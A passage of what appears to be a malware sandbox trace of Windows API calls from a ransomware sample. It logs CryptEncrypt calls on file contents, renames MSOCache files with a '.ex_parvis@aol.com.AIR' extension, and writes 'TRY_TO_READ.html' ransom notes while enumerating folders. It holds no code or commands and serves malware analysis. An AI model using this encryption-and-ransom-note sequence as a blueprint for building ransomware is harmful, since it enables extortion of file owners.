hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.804] GetProcessHeap () returned 0x2e0000 [0142.804] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.804] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.804] WriteFile (in: hFile=0x498, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.806] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.806] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.806] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x264400) returned 0x30d0020 [0142.807] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x264400) returned 0x3340020 [0142.807] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.807] ReadFile (in: hFile=0x498, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x264400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x264400, lpOverlapped=0x0) returned 1 [0142.972] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.972] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.972] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", dwFileAttributes=0x80) returned 1 [0142.975] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 76 [0142.975] GetProcessHeap () returned 0x2e0000 [0142.975] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0142.975] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" [0142.975] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0142.975] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.980] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498 [0142.980] GetProcessHeap () returned 0x2e0000 [0142.980] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.980] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4095519) returned 1 [0142.980] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x3e7e1f [0142.980] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.980] GetProcessHeap () returned 0x2e0000 [0142.980] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.980] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.981] WriteFile (in: hFile=0x498, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.987] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.987] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.987] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x3e7e1f) returned 0x30d0020 [0142.988] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x3e7e1f) returned 0x34c0020 [0142.988] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.988] ReadFile (in: hFile=0x498, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x3e7e1f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x3e7e1f, lpOverlapped=0x0) returned 1 [0143.226] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e118 [0143.226] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.226] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.226] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.226] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.226] GetLastError () returned 0x0 [0143.226] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.227] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.227] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.227] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.227] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.227] GetLastError () returned 0x0 [0143.227] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0143.227] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.227] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.227] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.227] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.227] GetLastError () returned 0x0 [0143.227] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.231] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ab48 | out: hHeap=0x2e0000) returned 1 [0143.231] WriteFile (in: hFile=0x49c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0143.232] WriteFile (in: hFile=0x49c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0143.232] WriteFile (in: hFile=0x49c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0143.233] CloseHandle (hObject=0x49c) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0143.234] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.234] GetLastError () returned 0x0 [0143.234] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.234] GetLastError () returned 0x0 [0143.234] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.234] GetLastError () returned 0x0 [0143.234] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.234] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.234] GetLastError () returned 0x0 [0143.234] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest", cAlternateFileName="MICROS~1.MAN")) returned 1 [0143.234] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.235] GetLastError () returned 0x0 [0143.235] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.235] GetLastError () returned 0x0 [0143.235] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.235] GetLastError () returned 0x0 [0143.235] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.235] GetLastError () returned 0x0 [0143.235] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.235] GetLastError () returned 0x0 [0143.235] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0143.235] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.235] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.236] GetLastError () returned 0x0 [0143.236] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.236] GetLastError () returned 0x0 [0143.236] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.236] GetLastError () returned 0x0 [0143.236] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.236] GetLastError () returned 0x0 [0143.236] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.236] HeapFree (in: 